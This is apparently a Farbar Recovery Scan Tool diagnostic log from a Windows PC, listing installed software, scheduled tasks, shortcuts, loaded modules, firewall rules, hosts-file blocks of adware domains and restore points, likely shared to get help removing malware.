- BitTorrent Inc.) 1.1.3 (HKLM-x32\...\{A4046FE1-986B-4463-B4DD-CFA473A7056B}_is1) (Version: - PDFZilla) 7-Zip 15.14 (HKLM-x32\...\7-Zip) (Version: 15.14 - Igor Pavlov) Ability Mail Server 4.2.6 (HKLM-x32\...\Ability Mail Server 4_is1) (Version: - Code Crafters Software Limited) Adobe Flash Player 20 ActiveX & Plugins 64-bit (HKLM\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated) Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.) Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.) Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.) BlackBerry 10 Desktop Software (Blend, Link, Drivers) (HKLM-x32\...\{c33e77db-89b5-4abf-a1d1-97f8b35347e1}) (Version: 1.2.0.52 - BlackBerry) BlackBerry Blend (HKLM-x32\...\{1DA42C01-4ED2-4B4E-B90C-18FCBA12FC41}) (Version: 1.2.0.50 - BlackBerry Ltd.) Hidden BlackBerry Communication Drivers (HKLM-x32\...\{46CD5A63-0C1F-45C3-B643-CA87A17275C0}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden BlackBerry Device Drivers (HKLM-x32\...\{1F6490E5-7540-426D-BC1E-EB57B0BF0C38}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden BlackBerry Link (HKLM-x32\...\{C42468F9-9812-4550-A54B-5DDB062EB10F}) (Version: 1.2.4.39 - BlackBerry) Hidden BlackBerry Link Remover (HKLM-x32\...\{44D65CAB-1BC8-47B7-BF5B-3EB8B6BB0276}) (Version: 1.2.4.0 - BlackBerry Ltd.) Hidden Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 7.0.1.0 - FlashPeak Inc.) GLO 3G PLUS (HKLM-x32\...\GLO 3G PLUS) (Version: 11.300.05.03.251 - Huawei Technologies Co.,Ltd) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.109 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden HP Hotkey Support (HKLM-x32\...\{6E7401DB-B722-4428-BE94-DD4740CF6464}) (Version: 5.0.28.1 - Hewlett-Packard Company) HP Software Framework (HKLM-x32\...\{886D1141-25E5-431F-8326-C3DB6FFCCAF0}) (Version: 4.0.96.1 - Hewlett-Packard Company) HP Support Solutions Framework (HKLM-x32\...\{930B5F2B-8DB9-42F4-90E4-5D3DC30541C3}) (Version: 12.10.49.21 - HP Inc.) HP System Event Utility (HKLM-x32\...\{29E20347-C62F-4657-938E-876A182B67F1}) (Version: 1.4.13 - HP Inc.) iCloud (HKLM\...\{05D97028-FD26-4A3D-BADC-D1CA2E9F1214}) (Version: 7.10.0.9 - Apple Inc.) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation) Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.) iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.) KeePass Password Safe 2.39.1 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.39.1 - Dominik Reichl) LSI HDA Modem (HKLM\...\LSI Soft Modem) (Version: 2.2.100 - LSI Corporation) Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes) Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1 (1033)) (Version: - ) Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM-x32\...\M2698023) (Version: - ) Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM-x32\...\M2833941) (Version: - ) Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM-x32\...\M979906) (Version: - ) Microsoft .NET Framework 1.1 SP1 (HKLM\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: - ) Microsoft .NET Framework 1.1 SP1 (HKLM\...\Microsoft .NET Framework 1.1 (1033)) (Version: - ) Microsoft Office Professional Edition 2003 (HKLM-x32\...\{90110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.5614.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation) OpenVPN 2.4.6-I602 (HKLM\...\OpenVPN) (Version: 2.4.6-I602 - OpenVPN Technologies, Inc.) Opera Stable 58.0.3135.65 (HKLM-x32\...\Opera 58.0.3135.65) (Version: 58.0.3135.65 - Opera Software) PowerISO (HKLM-x32\...\PowerISO) (Version: 7.2 - Power Software Ltd) Registry Recycler (HKLM-x32\...\Registry Recycler_is1) (Version: 0.9.3.1 - Developer Tribe (Pvt) Ltd.) SAM CoDeC Pack (HKLM\...\SAM CoDeC Pack) (Version: 5.85 - www.SamLab.ws) Skype version 8.39 (HKLM-x32\...\Skype_is1) (Version: 8.39 - Skype Technologies S.A.) SmarterMail Sync for Outlook 2003 and above (HKLM-x32\...\{6567F265-62EC-4BA9-9629-6B483B608854}) (Version: 1.0 - Smarter Tools) Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.19.65 - Synaptics Incorporated) Syncios 6.5.8 (HKLM-x32\...\Syncios) (Version: 6.5.8 - Anvsoft) Syncios Data Recovery 2.0.5 (HKLM-x32\...\06d5deef-8cb6-52ed-a43f-f181f836384a) (Version: 2.0.5 - Syncios Data Recovery) TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - ) TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.53254 - TeamViewer) VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN) WhatsApp (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\WhatsApp) (Version: 0.3.1409 - WhatsApp) WinAce Archiver (HKLM-x32\...\WinAce Archiver) (Version: 2.69 - e-merge GmbH) Windows Driver Package - Google Corporation (androidusb) USB (11/11/2015 1.0.0020.00000) (HKLM\...\964D20A0C219E8C327639DBA3C1FD49434216922) (Version: 11/11/2015 1.0.0020.00000 - Google Corporation) Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass (11/11/2015 2.0.0020.00000) (HKLM\...\B02D55DC05C888A284041A2F8A294C0D557A218C) (Version: 11/11/2015 2.0.0020.00000 - Google, Inc.) Windows Driver Package - SAMSUNG Electronics Co., Ltd. (ssudmdm) Modem (08/24/2016 2.12.4.0) (HKLM\...\B8C7DCAC7E5C993BD8367E5832C6C99E0B248D7A) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. ) Windows Driver Package - SAMSUNG Electronics Co., Ltd. (WinUSB) AndroidUsbDeviceClass (08/24/2016 2.12.4.0) (HKLM\...\609138CA03F1F9B54E04FA4DAB7C0C3F28DE9464) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. ) WinRAR 5.30 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2014-04-21] (Tonec Inc. -> Tonec Inc.) ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) ContextMenuHandlers1-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll -> No File ContextMenuHandlers1-x32: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2019-01-15] (Apple Inc. -> Apple Inc.) ContextMenuHandlers1-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd) ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) ContextMenuHandlers4-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll -> No File ContextMenuHandlers4-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd) ContextMenuHandlers4-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2015-06-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) ContextMenuHandlers6-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) ContextMenuHandlers6-x32: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers6-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd) ContextMenuHandlers6-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers6-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {019A414B-EDCF-464E-A4FF-6E1780935AB0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe (HP Inc. -> HP Inc.) Task: {121858E1-B466-49DB-ABBF-BE0AD32980CE} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001UA => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe Task: {44D766A4-890D-4187-8209-27B0E5320737} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe (Apple Inc. -> Apple Inc.) Task: {4759FCE5-417F-4558-A8AE-4C124D2B53A7} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated -> Synaptics Incorporated) Task: {4B307496-C19B-4F0D-8A51-8EA93C3082D4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.) Task: {531B0429-4A10-4627-84B1-F2408752272D} - System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold## => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe (Hewlett-Packard Company -> HP Inc.) Task: {766C85C7-D024-4937-AD2A-1D565A0EFE0E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.) Task: {7F232E68-AE32-41F8-B98F-689DC0D3D5E5} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe (HP Inc. -> HP Inc.) Task: {8292C123-B9AC-4784-B31B-420E6D1FFE44} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe (HP Inc. -> HP Inc.) Task: {83DEE68E-A3DD-4AE5-9A83-06EC0861E6BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.) Task: {9983ADBE-CDF4-4EB7-BA08-126F95152E4E} - System32\Tasks\Opera scheduled Autoupdate 1525449700 => C:\Program Files\Opera\launcher.exe (Opera Software AS -> Opera Software) Task: {B5D3DB14-5265-4538-9CB9-FDAA4A1D4D8B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.) Task: {C28388CC-478E-460F-BC73-1BB706E4CB8B} - System32\Tasks\{C2F55618-3604-4E37-AF83-6C71B337894D} => C:\Windows\system32\pcalua.exe -a C:\Users\Stanley\Downloads\Programs\ability-mail-server\setup.exe -d C:\Users\Stanley\Downloads\Programs\ability-mail-server Task: {DA1D9517-63D2-4DD4-B496-824CB060ABE0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe (HP Inc. -> HP Inc.) Task: {DCD49F79-E1DD-40AB-8653-E3D1BA2C9E1F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.) Task: {E6E376AE-3FCC-45F3-89EB-014031777959} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.) Task: {E9BDD47D-D63C-4F59-8B54-0B30B7E5D664} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001Core => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe+HPCeeScheduleFor#Strazzo.RoseGold## (null)!STRAZZOWEEZY\#Strazzo.Ros ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) Shortcut: C:\Users\Stanley\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.co ShortcutWithArgument: C:\Users\Stanley\Desktop\Chrome Plus - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default" ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1" ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP 2 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2" ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP 3 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 3" ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x0000002a hxxp://www.yandex.ru/?win=331&clid=2100779 ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.Почта.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x00000038 hxxp://mail.yandex.ru/?win=331&clid=2100779&from=dist_tl ==================== Loaded Modules (Whitelisted) ============== 2018-05-16 02:59 - 2018-05-16 02:59 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll 2019-01-15 01:27 - 2019-01-15 01:27 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll 2018-04-26 17:24 - 2018-04-26 17:24 - 000226208 _____ () C:\Program Files\OpenVPN\bin\liblzo2-2.dll 2018-04-26 17:24 - 2018-04-26 17:24 - 000127488 _____ () C:\Program Files\OpenVPN\bin\libpkcs11-helper-1.dll 2015-06-02 05:00 - 2015-06-02 05:00 - 000102912 _____ () C:\Windows\System32\IccLibDll_x64.dll 2019-01-23 16:33 - 2019-01-23 16:33 - 000088888 _____ () C:\Program Files\iTunes\zlib1.dll 2019-01-23 16:33 - 2019-01-23 16:33 - 001356088 _____ () C:\Program Files\iTunes\libxml2.dll 2019-02-15 00:30 - 2019-01-25 16:36 - 002845712 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll 2019-02-15 00:30 - 2019-01-24 11:09 - 002714000 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll 2015-05-26 16:46 - 2015-05-26 16:46 - 000094208 _____ () C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\libxpmux.dll 2018-04-12 18:06 - 2019-02-08 19:51 - 001837672 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll 2019-02-14 02:43 - 2019-02-08 19:51 - 002400096 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\skypert.dll 2019-02-14 02:42 - 2019-02-08 19:51 - 000097840 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keytar\build\Release\keytar.node 2019-02-14 02:42 - 2019-02-08 19:51 - 000219696 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\electron-ssid\build\Release\electron-ssid.node 2019-02-14 02:42 - 2019-02-08 19:51 - 000081768 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\desktop-idle\build\Release\desktopIdle.node 2019-01-15 01:28 - 2019-01-15 01:28 - 001042744 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll 2019-01-15 01:28 - 2019-01-15 01:28 - 000189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll 2018-05-16 02:59 - 2018-05-16 02:59 - 000076088 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll 2018-04-12 18:06 - 2019-02-08 19:51 - 002901504 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libglesv2.dll 2018-04-12 18:06 - 2019-02-08 19:51 - 000015360 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libegl.dll 2019-02-14 02:42 - 2019-02-08 19:51 - 000405056 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\@paulcbetts\spellchecker\build\Release\spellchecker.node 2019-02-14 02:42 - 2019-02-08 19:51 - 000138816 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keyboard-layout\build\Release\keyboard-layout-manager.node 2019-02-14 02:42 - 2019-02-08 19:52 - 003257192 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\Processing.NDI.Lib.x86.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\38318503.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\38318503.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) IE trusted site: HKU\.DEFAULT\...\localhost -> localhost IE trusted site: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\localhost -> localhost ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2013-08-22 14:25 - 2019-02-05 00:52 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts 127.0.0.1 space1.adminpressure.space 127.0.0.1 trackpressure.website 127.0.0.1 htagzdownload.pw 127.0.0.1 texttotalk.org 127.0.0.1 360devtraking.website 127.0.0.1 room1.360dev.info 127.0.0.1 djapp.info 127.0.0.1 technologievimy.com ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Stanley\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img4.jpg DNS Servers: 192.168.8.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == If an entry is included in the fixlist, it will be removed. MSCONFIG\Services: TeamViewer => 2 MSCONFIG\Services: TenorshareWinAdService => 2 MSCONFIG\Services: WsAppService => 2 MSCONFIG\startupreg: utweb => "C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe" /MINIMIZED HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "utweb" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "IncrediMail" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "RIMDeviceManager" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "QTWQA7PTCRBGCEE" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [TCP Query User{27AB2084-96CC-423D-8AE7-D0AC93666081}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [UDP Query User{3AF93F33-8A51-4215-BC5E-F4DB7A8EEE52}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{50B50355-5350-4725-BD33-5A7C6482C01A}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{E18A37C3-3221-4F6B-9241-67BE79FCF0DC}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{07B5D44D-4E10-43B2-9078-1C393459622F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe No File FirewallRules: [{667D3D91-E5EA-4EA3-9A3C-5C2F77E71A0D}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe No File FirewallRules: [{0CF852DE-F4B5-441D-95F8-130531A3076F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe No File FirewallRules: [{0513F420-E8DE-4C74-BAF0-F3CFF66CE5C6}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe No File FirewallRules: [{6DDFF7C5-16FF-49FF-95F9-472442614287}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.) FirewallRules: [{255BD4B5-55AB-4A04-AF01-2ECA95F1F335}] => (Allow) C:\Program Files\Opera\58.0.3135.65\opera.exe (Opera Software AS -> Opera Software) FirewallRules: [TCP Query User{DD2AF73D-267B-418A-A0F5-05DD5ED97831}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [UDP Query User{A7B50CA7-7E26-4E38-BC39-4332936FB3E2}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.) ==================== Restore Points ========================= 30-01-2019 08:42:13 Scheduled Checkpoint 07-02-2019 07:32:46 Scheduled Checkpoint 14-02-2019 03:01:16 Removed IncrediMail. 14-02-2019 23:59:09 Restore Point Created by FRST 16-02-2019 07:50:46 JRT 